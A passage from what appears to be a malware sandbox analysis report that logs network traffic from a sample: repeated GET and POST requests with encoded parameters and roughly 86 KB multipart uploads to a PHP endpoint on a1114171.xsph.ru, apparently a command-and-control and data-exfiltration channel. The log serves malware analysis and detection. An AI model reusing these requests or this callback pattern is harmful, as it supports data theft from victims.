NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMisHL9JCMYZWaNhlYndmeOl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=d1nIVtGVQJFMJJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIyIjNwQjZykTOmVmZilDZmF2N2ITZldjZ1gzMyImZmJGZlFTM3gTYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryhZ5M9Wqw26useWavUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86516Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=QX9JiI6ISZxgTM3IGOwUWZwIzNwkzYwgTM2E2MkJzN4gDOiNTNlJCLiQzM5ImMmJWZyYTYyMTOyEGM5QGZkVzN4ETN4YjMmFjY4YWMkdjNjVmI6IiMxEWYjZWZmZ2YjJzMkVTMwcTNkZmM0YTMyIGNkRmZjJCLiYGN2UmM4IWM1czY5czYjFTMmdzMkN2MjRzNwQmZyQGOyAzM2IGO0kjI6ICOjJmNmdDZ3MWZjBjN5EGOjZWZ3MDM1ITZhJmYzEDNxIyes0nIRZWOKl3Y0JUaOFTRqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryvmZ3YPav2beoH3pkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary5pDZQI1oOHOwFnSmUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86551Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary2ovdIKfbG5MHvCFIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a1114171.xsph.ruContent-Length: 86563Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundarybvsmeehOJIL9xxMCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1114171.xsph.ruContent-Length: 86543Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET 